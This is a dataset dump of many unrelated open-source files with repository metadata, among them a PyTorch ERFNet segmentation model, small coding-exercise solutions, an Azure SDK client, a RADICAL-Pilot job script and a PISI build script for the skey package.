display(out, ori_imgs, imshow=False, imwrite=True)
print('running speed test...')
print('inferring image for 10 times...')
with torch.no_grad():
t1 = time.time()
for _ in range(10):
_, regression, classification, anchors = model(x)
out = postprocess(x,
anchors, regression, classification,
regressBoxes, clipBoxes,
threshold, iou_threshold)
out = invert_affine(framed_metas, out)
t2 = time.time()
tact_time = (t2 - t1) / 10
print(f'{tact_time} seconds, {1 / tact_time} FPS, @batch_size 1')
| [
"1115957667@qq.com"
] | 1115957667@qq.com |
4c1558020a925591526dba739b3b46af07ba9307 | 65b4522c04c2be071c2d42095956fe950fe1cebe | /inversions/static_inversion/static_inversion2/occam_for_rake_no_seafloor/run1/slip0/plot_slip.py | 89a534bddf2e16da7f37a1ce25c633ddde142466 | [] | no_license | geodesy/viscojapan | ac0cd93f7a2134cd2651623b94879dcc21c0c46a | 03e70265b56eb5994e73bcb6066f0be338e42f27 | refs/heads/master | 2021-03-03T18:19:07.779601 | 2015-07-16T03:50:49 | 2015-07-16T03:50:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 197 | py | import viscojapan as vj
mplt = vj.plots.MapPlotFault('../../../fault_model/fault_bott60km.h5')
mplt.plot_slip_file('slip0.h5',0)
vj.plots.plt.savefig('initial_slip_input.png')
vj.plots.plt.show()
| [
"zy31415@gmail.com"
] | zy31415@gmail.com |
6246c7a30ce3f69a4b0a6b6d1afd3b28493dd43f | b3f6daa5d6c987eb8a61d5fe125bf2a98997e259 | /8kyu/Multiplication table for number/index.py | 1f321270b077646deb2dd5ef0a6e0be9bc926544 | [] | no_license | krnets/codewars-practice | 53a0a6c9d2d8c2b94d6799a12f48dd588179a5ce | 5f8e1cc1aebd900b9e5a276884419fc3e1ddef24 | refs/heads/master | 2022-12-20T19:33:43.337581 | 2022-12-16T05:32:39 | 2022-12-16T05:32:39 | 217,464,785 | 1 | 0 | null | 2020-07-20T08:36:31 | 2019-10-25T06:20:41 | JavaScript | UTF-8 | Python | false | false | 934 | py | # 8kyu - Multiplication table for number
""" Your goal is to return multiplication table for number that is always an integer from 1 to 10.
For example, a multiplication table (string) for number == 5 looks like below:
1 * 5 = 5
2 * 5 = 10
3 * 5 = 15
4 * 5 = 20
5 * 5 = 25
6 * 5 = 30
7 * 5 = 35
8 * 5 = 40
9 * 5 = 45
10 * 5 = 50
P. S. You can use \n in string to jump to the next line. """
# def multi_table(n):
# res = ''
# for i in range(1, 11):
# res += f'{str(i)} * {n} = {str(i * n)}\n'
# return res.rstrip()
def multi_table(number):
return '\n'.join(f'{i} * {number} = {i * number}' for i in range(1, 11))
q = multi_table(5)
q
# '1 * 5 = 5\n2 * 5 = 10\n3 * 5 = 15\n4 * 5 = 20\n5 * 5 = 25\n6 * 5 = 30\n7 * 5 = 35\n8 * 5 = 40\n9 * 5 = 45\n10 * 5 = 50'
q = multi_table(1)
q
# '1 * 1 = 1\n2 * 1 = 2\n3 * 1 = 3\n4 * 1 = 4\n5 * 1 = 5\n6 * 1 = 6\n7 * 1 = 7\n8 * 1 = 8\n9 * 1 = 9\n10 * 1 = 10'
| [
"cmantheo@gmail.com"
] | cmantheo@gmail.com |
3afd7c0568a43bde56e0611f65fcbdc799c94449 | 35ff4e124ea73cd2630ddf25dfe019b4b4e3f5d6 | /994_RottingOranges/994_RottingOranges.py | 777017151f0b833177bea0e63b0c234941faf4e8 | [] | no_license | H-Cong/LeetCode | 0a2084a4845b5d7fac67c89bd72a2adf49f90c3d | d00993a88c6b34fcd79d0a6580fde5c523a2741d | refs/heads/master | 2023-03-19T15:22:00.971461 | 2021-03-11T00:33:00 | 2021-03-11T00:33:00 | 303,265,129 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py | class Solution:
def orangesRotting(self, grid: List[List[int]]) -> int:
'''
BFS
'''
if not grid or not grid[0]: return -1
queue = collections.deque()
fresh_orange = 0
row, col = len(grid), len(grid[0])
for r in range(row):
for c in range(col):
if grid[r][c] == 2:
queue.append((r,c))
elif grid[r][c] == 1:
fresh_orange += 1
ans = 0
while queue and fresh_orange:
ans += 1
for _ in range(len(queue)): # NOTE
r, c = queue.popleft()
directions = [(r+1, c), (r-1, c), (r, c+1), (r, c-1)]
for x, y in directions:
if 0 <= x < row and 0 <= y < col and grid[x][y] == 1:
grid[x][y] = 2
fresh_orange -= 1
queue.append((x, y))
return ans if fresh_orange == 0 else -1
# TC: O(r*c)
# SC: O(r*c)
# NOTE: the queue.append() operation wont affect the len(queue) of current level
# ref: https://leetcode.com/problems/rotting-oranges/discuss/563686/
| [
"nych1989@gmail.com"
] | nych1989@gmail.com |
37654083f325ba530ff035d80eda3ac7a47eea19 | bad62c2b0dfad33197db55b44efeec0bab405634 | /sdk/communication/azure-mgmt-communication/azure/mgmt/communication/aio/_communication_service_management_client.py | c3e466542f9cfccfbf535c2dbf61537086ee6f3a | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | test-repo-billy/azure-sdk-for-python | 20c5a2486456e02456de17515704cb064ff19833 | cece86a8548cb5f575e5419864d631673be0a244 | refs/heads/master | 2022-10-25T02:28:39.022559 | 2022-10-18T06:05:46 | 2022-10-18T06:05:46 | 182,325,031 | 0 | 0 | MIT | 2019-07-25T22:28:52 | 2019-04-19T20:59:15 | Python | UTF-8 | Python | false | false | 5,024 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from copy import deepcopy
from typing import Any, Awaitable, TYPE_CHECKING
from msrest import Deserializer, Serializer
from azure.core.rest import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from .. import models
from ._configuration import CommunicationServiceManagementClientConfiguration
from .operations import CommunicationServicesOperations, DomainsOperations, EmailServicesOperations, Operations
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
class CommunicationServiceManagementClient:
"""REST API for Azure Communication Services.
:ivar operations: Operations operations
:vartype operations: azure.mgmt.communication.aio.operations.Operations
:ivar communication_services: CommunicationServicesOperations operations
:vartype communication_services:
azure.mgmt.communication.aio.operations.CommunicationServicesOperations
:ivar domains: DomainsOperations operations
:vartype domains: azure.mgmt.communication.aio.operations.DomainsOperations
:ivar email_services: EmailServicesOperations operations
:vartype email_services: azure.mgmt.communication.aio.operations.EmailServicesOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: The ID of the target subscription.
:type subscription_id: str
:param base_url: Service URL. Default value is "https://management.azure.com".
:type base_url: str
:keyword api_version: Api Version. Default value is "2021-10-01-preview". Note that overriding
this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: str = "https://management.azure.com",
**kwargs: Any
) -> None:
self._config = CommunicationServiceManagementClientConfiguration(credential=credential, subscription_id=subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self._serialize.client_side_validation = False
self.operations = Operations(self._client, self._config, self._serialize, self._deserialize)
self.communication_services = CommunicationServicesOperations(self._client, self._config, self._serialize, self._deserialize)
self.domains = DomainsOperations(self._client, self._config, self._serialize, self._deserialize)
self.email_services = EmailServicesOperations(self._client, self._config, self._serialize, self._deserialize)
def _send_request(
self,
request: HttpRequest,
**kwargs: Any
) -> Awaitable[AsyncHttpResponse]:
"""Runs the network request through the client's chained policies.
>>> from azure.core.rest import HttpRequest
>>> request = HttpRequest("GET", "https://www.example.org/")
<HttpRequest [GET], url: 'https://www.example.org/'>
>>> response = await client._send_request(request)
<AsyncHttpResponse: 200 OK>
For more information on this code flow, see https://aka.ms/azsdk/python/protocol/quickstart
:param request: The network request you want to make. Required.
:type request: ~azure.core.rest.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to False.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.rest.AsyncHttpResponse
"""
request_copy = deepcopy(request)
request_copy.url = self._client.format_url(request_copy.url)
return self._client.send_request(request_copy, **kwargs)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "CommunicationServiceManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
| [
"noreply@github.com"
] | test-repo-billy.noreply@github.com |
3365d477bc72257548753a3d59e5bf3acff947b8 | 17079988dedef6f830633a7a54b181355231fe3e | /pattern.py | 42a4935c831b024ce611f8d9fc3393de41d08823 | [] | no_license | sum008/python-backup | cdf6eaff60d882c36fe86b47ad311955d5869b02 | 729fbe2a5220941f9ba085c693c871592a529da8 | refs/heads/master | 2022-12-12T21:21:48.259680 | 2020-09-12T15:36:05 | 2020-09-12T15:36:05 | 285,461,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,070 | py | def draw(n):
count=0
max1=0
temp=0
for i in range(1,2*n):
for j in range(2*n-1,0,-1):
if i<=2*n//2:
if count<=max1:
print(str(n-count),end=" ")
temp=count
count+=1
elif count>max1 and not count>j:
print(str(n-temp),end=" ")
else :
temp-=1
print(str(n-temp),end=" ")
else:
if count<=max1:
print(str(n-count),end=" ")
temp=count
count+=1
elif count>max1 and not count>j:
print(str(n-temp),end=" ")
else :
temp-=1
print(str(n-temp),end=" ")
if i<2*n//2: max1+=1
else: max1-=1
count=0
print()
draw(5)
| [
"noreply@github.com"
] | sum008.noreply@github.com |
625054a1aec470b6b43bdf069cfd9cd5e5c346ed | 42260c6cb630820076e771563b589435af6dc247 | /django_by_example/urls.py | d911d81b254bfcddf0f5d0f4dc3af5f4d960cc2d | [] | no_license | pbpoon/dbe | a903aed27a44dc7943976fffd79a1f33d9edf341 | bd50976ab3141ef75a3d5324d8b1e0258281f149 | refs/heads/master | 2021-01-23T01:12:39.242625 | 2017-05-31T13:32:16 | 2017-05-31T13:32:16 | 92,856,979 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,092 | py | """django_by_example URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
url(r'^images/', include('images.urls', namespace='images')),
url(r'^', include('account.urls')),
url(r'^admin/', admin.site.urls),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
| [
"pbpoon@live.com"
] | pbpoon@live.com |
50622297f1a784aa10e0f4e3a806c9881f47e51e | 792cf43c94131428331f2ed8a868144e54948975 | /최종 소스코드(완성본)/html/djangoTest/oiserver/migrations/0010_multiplayroom_roomjson.py | 5d92840acf2be24ea01a9c32459b862598404d22 | [
"MIT"
] | permissive | BaeKeunBin/OIWebProject | c77e74ab4a3cdaea3d220940f7e33ad2b54dea01 | 60467fdec8169dd8a7ac3bf8256d3c06635ba8c5 | refs/heads/master | 2020-04-14T01:41:33.424968 | 2019-02-06T07:54:47 | 2019-02-06T07:54:47 | 115,590,590 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-03-20 12:06
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('oiserver', '0009_multiplayroom'),
]
operations = [
migrations.AddField(
model_name='multiplayroom',
name='roomJson',
field=models.TextField(default='default'),
),
]
| [
"lih0420@naver.com"
] | lih0420@naver.com |
061bea63baa0453a60bd7572e9139a98261d8556 | e8f99a162207cba82d4e0f969d7bcdb2b9d8b522 | /dev_demo/struct_demo/struct_demo.py | b9adbaf56356e3ebbebdaefe99d8d4121a77165c | [] | no_license | TesterCC/Python3Scripts | edb5446278ebf13edb64336001081941ca27d67d | 58be67e1ffc74ef50289a885aa4ad05f58e2c383 | refs/heads/master | 2023-08-30T21:16:38.328045 | 2023-08-17T11:23:08 | 2023-08-17T11:23:08 | 93,401,996 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 347 | py | import struct
# 网络字节序,大端序,数据封装测试
# 方法1:个人认为这个更优
file_header = 0xF3EC2B12
packed_data = struct.pack(">I", file_header)
print(len(packed_data), packed_data)
# 方法2:
hex_str = "F3EC2B12"
bytes_data = bytes.fromhex(hex_str)
print(len(bytes_data), bytes_data)
# output
# 4 b'\xf3\xec+\x12' | [
"testerlyx@foxmail.com"
] | testerlyx@foxmail.com |
9ea419e362a04349cd7136800c00330c6e3e4e10 | 1b08865f72e231a844ca5d3b166d12bdd2a3787a | /bin/getting_started_osg.py | a153fb7cb87a2274076567a25ddfe780036c27de | [] | no_license | radical-experiments/osg_testing | 71536cdfadc7e9eade9b42b25dfc6894462e91a4 | 2b534e3e7420548324fc8f600d1c1c722b8e0b38 | refs/heads/master | 2021-01-17T18:45:35.006374 | 2016-06-19T20:43:18 | 2016-06-19T20:43:18 | 60,442,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,215 | py | #!/usr/bin/env python
__copyright__ = "Copyright 2013-2015, http://radical.rutgers.edu"
__license__ = "MIT"
import os
import sys
import radical.pilot as rp
import radical.utils as ru
import time
dh = ru.DebugHelper ()
print rp
RUNTIME = 1800
SLEEP = 10
PILOTS = 1
UNITS = 1
SCHED = rp.SCHED_BACKFILLING
#SCHED = "backfilling"
resources = {
'osg.xsede-virt-clust' : {
'project' : 'TG-CCR140028',
'queue' : None,
'schema' : 'ssh'
},
'osg.connect' : {
'project' : 'RADICAL',
'queue' : None,
'schema' : 'ssh'
}
}
start_time = time.time()
p_state = []
u_state = []
#------------------------------------------------------------------------------
#
def pilot_state_cb (pilot, state):
if not pilot:
return
#print "[Callback]: ComputePilot '%s' state: %s." % (pilot.uid, state)
# p_state.append([pilot.uid, state, time.time() - start_time])
print [pilot.uid, state, time.time() - start_time]
# Hello HTC :-)
#if state == rp.FAILED:
# sys.exit (1)
#------------------------------------------------------------------------------
#
CNT = 0
def unit_state_cb (unit, state):
if not unit:
return
global CNT
#print "[Callback]: unit %s on %s: %s." % (unit.uid, unit.pilot_id, state)
# u_state.append([unit.uid, unit.pilot_id, state, time.time() - start_time])
print [unit.uid, unit.pilot_id, state, time.time() - start_time]
if state in [rp.FAILED, rp.DONE, rp.CANCELED]:
CNT += 1
#print "[Callback]: # %6d" % CNT
# Hello HTC :-)
#if state == rp.FAILED:
# print "stderr: %s" % unit.stderr
# sys.exit(2)
#------------------------------------------------------------------------------
#
def wait_queue_size_cb(umgr, wait_queue_size):
pass
#print "[Callback]: wait_queue_size: %s." % wait_queue_size
#------------------------------------------------------------------------------
#
if __name__ == "__main__":
# we can optionally pass session name to RP
if len(sys.argv) > 1:
resource = sys.argv[1]
else:
resource = 'local.localhost'
print 'running on %s' % resource
# Create a new session. No need to try/except this: if session creation
# fails, there is not much we can do anyways...
session = rp.Session()
print "session id: %s" % session.uid
# all other pilot code is now tried/excepted. If an exception is caught, we
# can rely on the session object to exist and be valid, and we can thus tear
# the whole RP stack down via a 'session.close()' call in the 'finally'
# clause...
try:
pmgr = rp.PilotManager(session=session)
pmgr.register_callback(pilot_state_cb)
pdescs = list()
for p in range(PILOTS):
pdesc = rp.ComputePilotDescription()
pdesc.resource = resource
pdesc.cores = 1
pdesc.project = resources[resource]['project']
pdesc.queue = resources[resource]['queue']
pdesc.runtime = RUNTIME
pdesc.cleanup = False
pdesc.access_schema = resources[resource]['schema']
pdesc.candidate_hosts = [#'MIT_CMS',
#'UConn-OSG',
'!SU-OG', # No compiler
'!FIU_HPCOSG_CE', # zeromq build fails
#'BU_ATLAS_Tier2',
'!UCSDT2', # Failing because of format character ...
'~(HAS_CVMFS_oasis_opensciencegrid_org =?= TRUE)'
]
pdescs.append(pdesc)
pilots = pmgr.submit_pilots(pdescs)
umgr = rp.UnitManager(session=session, scheduler=SCHED)
umgr.register_callback(unit_state_cb, rp.UNIT_STATE)
umgr.register_callback(wait_queue_size_cb, rp.WAIT_QUEUE_SIZE)
umgr.add_pilots(pilots)
cuds = list()
for unit_count in range(0, UNITS):
cud = rp.ComputeUnitDescription()
cud.executable = "/bin/sh"
cud.arguments = ["-c", "echo $HOSTNAME:$OSG_HOSTNAME && sleep %d" % SLEEP]
cud.cores = 1
cuds.append(cud)
units = umgr.submit_units(cuds)
print session
umgr.wait_units()
print session
#os.system('radicalpilot-close-session -m export -s %s' %session.uid)
#for cu in units:
#print "* Task %s state %s, exit code: %s, stdout: %s, started: %s, finished: %s" \
# % (cu.uid, cu.state, cu.exit_code, cu.stdout, cu.start_time, cu.stop_time)
# os.system ("radicalpilot-stats -m stat,plot -s %s > %s.stat" % (session.uid, session_name))
# print "Pilot Information"
# for i in range(len(p_state)):
# print p_state[i]
# print "\n\nUnit Information"
# for i in range(len(u_state)):
# print u_state[i]
except Exception as e:
# Something unexpected happened in the pilot code above
print "caught Exception: %s" % e
raise
except (KeyboardInterrupt, SystemExit) as e:
# the callback called sys.exit(), and we can here catch the
# corresponding KeyboardInterrupt exception for shutdown. We also catch
# SystemExit (which gets raised if the main threads exits for some other
# reason).
print "need to exit now: %s" % e
finally:
# always clean up the session, no matter if we caught an exception or
# not.
#print "closing session"
os.system('radicalpilot-close-session -m export -s %s' %session.uid)
session.close (cleanup=False)
# the above is equivalent to
#
# session.close (cleanup=True, terminate=True)
#
# it will thus both clean out the session's database record, and kill
# all remaining pilots (none in our example).
#-------------------------------------------------------------------------------
| [
"ming.tai.ha@gmail.com"
] | ming.tai.ha@gmail.com |
9fbf31d149d9fda8df596871ddc7835f704c8451 | c0587882287eee1ca08e0cd30f6ece568da3de91 | /SS-3_files/erfnetv2.py | 6c2bb2efbd03cbd8b82f14b45ba12b1add665658 | [] | no_license | Ashutosh1995/Semseg-Notebooks | 7efe42cf44b647a38eecb4acedaf27c16c0986f7 | c60862da1790954373e57a1ac725d7279df14e59 | refs/heads/master | 2021-01-04T03:35:31.920484 | 2020-06-03T07:20:11 | 2020-06-03T07:20:11 | 240,360,922 | 13 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,889 | py | # ERFNet full model definition for Pytorch
# Sept 2017
# Eduardo Romera
#######################
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
class DownsamplerBlock (nn.Module):
def __init__(self, ninput, noutput):
super().__init__()
self.conv = nn.Conv2d(ninput, noutput-ninput, (3, 3), stride=2, padding=1, bias=True)
self.pool = nn.MaxPool2d(2, stride=2)
self.bn = nn.BatchNorm2d(noutput, eps=1e-3)
def forward(self, input):
output = torch.cat([self.conv(input), self.pool(input)], 1)
output = self.bn(output)
return F.relu(output)
class non_bottleneck_1d (nn.Module):
def __init__(self, chann, dropprob, dilated):
super().__init__()
self.conv3x1_1 = nn.Conv2d(chann, chann, (3, 1), stride=1, padding=(1,0), bias=True)
self.conv1x3_1 = nn.Conv2d(chann, chann, (1,3), stride=1, padding=(0,1), bias=True)
self.bn1 = nn.BatchNorm2d(chann, eps=1e-03)
self.conv3x1_2 = nn.Conv2d(chann, chann, (3, 1), stride=1, padding=(1*dilated,0), bias=True, dilation = (dilated,1))
self.conv1x3_2 = nn.Conv2d(chann, chann, (1,3), stride=1, padding=(0,1*dilated), bias=True, dilation = (1, dilated))
self.bn2 = nn.BatchNorm2d(chann, eps=1e-03)
self.dropout = nn.Dropout2d(dropprob)
def forward(self, input):
output = self.conv3x1_1(input)
output = F.relu(output)
output = self.conv1x3_1(output)
output = self.bn1(output)
output = F.relu(output)
output = self.conv3x1_2(output)
output = F.relu(output)
output = self.conv1x3_2(output)
output = self.bn2(output)
if (self.dropout.p != 0):
output = self.dropout(output)
return F.relu(output+input) #+input = identity (residual connection)
class Encoder(nn.Module):
def __init__(self, num_classes):
super().__init__()
self.initial_block = DownsamplerBlock(3,16)
self.layers = nn.ModuleList()
self.layers.append(DownsamplerBlock(16,64))
for x in range(0, 2): #5 times
self.layers.append(non_bottleneck_1d(64, 0.03, 1))
self.layers.append(DownsamplerBlock(64,128))
for x in range(0, 1): #2 times
self.layers.append(non_bottleneck_1d(128, 0.3, 2))
self.layers.append(non_bottleneck_1d(128, 0.3, 4))
self.layers.append(non_bottleneck_1d(128, 0.3, 8))
self.layers.append(non_bottleneck_1d(128, 0.3, 16))
#Only in encoder mode:
self.output_conv = nn.Conv2d(128, num_classes, 1, stride=1, padding=0, bias=True)
def forward(self, input, predict=False):
output = self.initial_block(input)
for layer in self.layers:
output = layer(output)
if predict:
output = self.output_conv(output)
return output
class UpsamplerBlock (nn.Module):
def __init__(self, ninput, noutput):
super().__init__()
self.conv = nn.ConvTranspose2d(ninput, noutput, 3, stride=2, padding=1, output_padding=1, bias=True)
self.bn = nn.BatchNorm2d(noutput, eps=1e-3)
def forward(self, input):
output = self.conv(input)
output = self.bn(output)
return F.relu(output)
class Decoder (nn.Module):
def __init__(self, num_classes):
super().__init__()
self.layers = nn.ModuleList()
self.layers.append(UpsamplerBlock(128,64))
self.layers.append(non_bottleneck_1d(64, 0, 1))
self.layers.append(non_bottleneck_1d(64, 0, 1))
self.layers.append(UpsamplerBlock(64,16))
self.layers.append(non_bottleneck_1d(16, 0, 1))
self.layers.append(non_bottleneck_1d(16, 0, 1))
self.output_conv = nn.ConvTranspose2d( 16, num_classes, 2, stride=2, padding=0, output_padding=0, bias=True)
def forward(self, input):
output = input
for layer in self.layers:
output = layer(output)
output = self.output_conv(output)
return output
#ERFNet
class Net(nn.Module):
def __init__(self, num_classes, encoder=None): #use encoder to pass pretrained encoder
super().__init__()
if (encoder == None):
self.encoder = Encoder(num_classes)
else:
self.encoder = encoder
self.encoder.load('model_best_encoder_decoder_pretrained.pth')
self.decoder = Decoder(num_classes)
def forward(self, input, only_encode=False):
if only_encode:
encoded_features = self.encoder.forward(input, predict=True)
return nn.functional.upsample(encoded_features,mode='bilinear',align_corners=False,scale_factor=8)
else:
output = self.encoder(input)
return self.decoder.forward(output)
| [
"you@example.com"
] | you@example.com |
824cb12edd917c05a044def25f6e971733c2eaac | 6af893ad82d23724700ac3fd80492396d84c9526 | /queencity20/eda/eda_incorporated_towards_end0.py | 85f292760c85cf19760361246c59b91476e473f1 | [] | no_license | abhijeetdtu/queencity20 | aefc9a2847b753ca25e2205faa651c822cd26e54 | 64c2c57ccc45b9ac29a6aadeeaa1e317f1460b0e | refs/heads/master | 2021-01-09T04:45:40.936932 | 2020-02-23T00:37:22 | 2020-02-23T00:37:22 | 242,249,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,421 | py | %load_ext autoreload
%autoreload 2
import pandas as pd
import numpy as np
from queencity20.utils.getData import *
from queencity20.utils.remove_correlated import *
from collections import defaultdict
df = getTrainingData()
df.head()
from sklearn.impute import SimpleImputer
#means = df.mean(skipna=True)
si = SimpleImputer(strategy="median")
df.loc[:,:] = si.fit_transform(df)
fdf = df
fdf = diffCols(fdf)
fdf["target"].describe()
fdf.shape
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
#X_train, X_test, y_train, y_test = testTrainSplit(fdf)
X = fdf.drop(["target"], axis=1)
y = fdf["target"]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)
#class_weight={"exceptionally high":1, "high":1,"low":1,"medium":25 }
from sklearn.metrics import mean_squared_error, r2_score,roc_auc_score, accuracy_score , confusion_matrix
cormat = fdf.corr()
cormat["target"].sort_values(ascending=False).head(20)
np.abs(cormat["target"]).sort_values(ascending=False).head(20).index
corcols = list(set(find_correlation(fdf.drop("target" , axis=1), threshold=0.8)))
len(corcols)
fdf = fdf.drop(corcols , axis=1)
X = fdf.drop(["target"], axis=1)
y = fdf["target"]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)
from sklearn.ensemble import RandomForestRegressor
rfr = RandomForestRegressor(max_depth=3)
rfr.fit(X_train , y_train)
featureImpDf = pd.DataFrame({"feature" : X_train.columns , "imp":rfr.feature_importances_})
featureImpDf.sort_values("imp" , ascending=False).head(20)["feature"].values
r2_score(y_test, rfr.predict(X_test))
from sklearn.model_selection import cross_val_score
from sklearn.ensemble import RandomForestRegressor
#rfr = RandomForestRegressor(n_estimators=5, max_samples=0.8 , max_features=30,ccp_alpha = 0.4,min_samples_split=4, max_depth=5)
rfr = RandomForestRegressor(n_estimators=50, max_samples=0.2 , max_features=0.7,ccp_alpha = 0.4,min_samples_split=4, max_depth=5)
rfr.fit(X,y)
cross_val_score(rfr , X,y ,scoring="neg_mean_squared_error" , cv=10)
testData = getTestData()
testData.loc[: , :] = si.fit_transform(testData)
#testData = testData.fillna(testData.mean(skipna=True))
testData = diffCols(testData)
testData = testData.drop(corcols , axis=1)
preds = rfr.predict(testData)
pd.DataFrame({"pred" : preds}).to_csv("submis.csv")
| [
"abhijeetdtu@gmail.com"
] | abhijeetdtu@gmail.com |
53399e598f3629727a5eda9661611aa9aeb09657 | f50f1aa1f8f139d546db3230a1cb1f53043fd9e6 | /system/base/skey/actions.py | 99e49fdc24508dbe9fe952a82367a3430bfa98c8 | [] | no_license | pars-linux/corporate2 | 7887961d1552d39bc3b0bef4a60fd3413d9b82bb | 14d1eacfc824fb8d0bff8173e7ac06b36b88d10d | refs/heads/master | 2020-05-26T15:02:12.005654 | 2017-02-27T03:07:14 | 2017-02-27T03:07:14 | 82,476,084 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,459 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.
#
# Note that we fiddle with permissions of everything to make sure not to make a security hole
#
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import libtools
from pisi.actionsapi import get
def setup():
shelltools.export("SENDMAIL", "/usr/sbin/sendmail")
shelltools.export("CFLAGS", "%s -DSKEY_HASH_DEFAULT=1" % get.CFLAGS())
autotools.configure("--sysconfdir=/etc/skey")
def build():
autotools.make()
def install():
### Runtime
for i in ["skey", "skeyinit", "skeyinfo"]:
pisitools.dobin(i)
for i in ["otp-md4", "otp-sha1", "otp-md5"]:
pisitools.dosym("skey", "/usr/bin/%s" % i)
pisitools.insinto("/usr/sbin", "skeyprune.pl", "skeyprune")
pisitools.insinto("/usr/bin", "skeyaudit.sh", "skeyaudit")
# these must be suid root so users can generate their passwords, fperms u+s,og-r
for i in ["skeyinit", "skeyinfo", "skeyaudit"]:
shelltools.chmod("%s/usr/bin/%s" % (get.installDIR(), i), 4755)
shelltools.chmod("%s/usr/bin/skey" % get.installDIR(), 0755)
shelltools.chmod("%s/usr/sbin/skeyprune" % get.installDIR(), 0755)
### Developement
pisitools.insinto("/usr/include", "skey.h")
for i in ["libskey.so.1.1.5", "libskey.so.1", "libskey.so"]:
# dolib borks with symlinks
# pisitools.dolib(i, destinationDirectory="/lib")
pisitools.insinto("/lib", i)
shelltools.chmod("%s/lib/%s" % (get.installDIR(), i), 0755)
#libtools.gen_usr_ldscript("libskey.so")
pisitools.dosym("../../lib/libskey.so", "/usr/lib/libskey.so")
### Config
# only root needs to have access to these files. fperms g-rx,o-rx /etc/skey
pisitools.dodir("/etc/skey")
shelltools.chmod("%s/etc/skey" % get.installDIR(), 0700)
# skeyinit will not function if this file is not present. these permissions are applied by the skey system if missing.
shelltools.touch("%s/etc/skey/skeykeys" % get.installDIR())
shelltools.chmod("%s/etc/skey/skeykeys" % get.installDIR(), 0600)
### Docs
for i in ["skey.1", "skeyaudit.1", "skeyinfo.1", "skeyinit.1", "skey.3", "skeyprune.8"]:
pisitools.doman(i)
pisitools.dodoc("CHANGES", "README")
| [
"zaburt@users.noreply.github.com"
] | zaburt@users.noreply.github.com |
6490fcc8e5763a6c0a7bb69a9a97d2da67c7c562 | 6f1034b17b49f373a41ecf3a5a8923fb4948992b | /pychron/git/tasks/githost_preferences.py | 9383d7e63d44223c0e21981f9c7290783093f3e2 | [
"Apache-2.0"
] | permissive | NMGRL/pychron | a6ec1854488e74eb5d3ff53eee8537ecf98a6e2f | 8cfc8085393ace2aee6b98d36bfd6fba0bcb41c6 | refs/heads/main | 2023-08-30T07:00:34.121528 | 2023-06-12T17:43:25 | 2023-06-12T17:43:25 | 14,438,041 | 38 | 28 | Apache-2.0 | 2023-08-09T22:47:17 | 2013-11-15T23:46:10 | Python | UTF-8 | Python | false | false | 4,486 | py | # ===============================================================================
# Copyright 2016 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
import requests
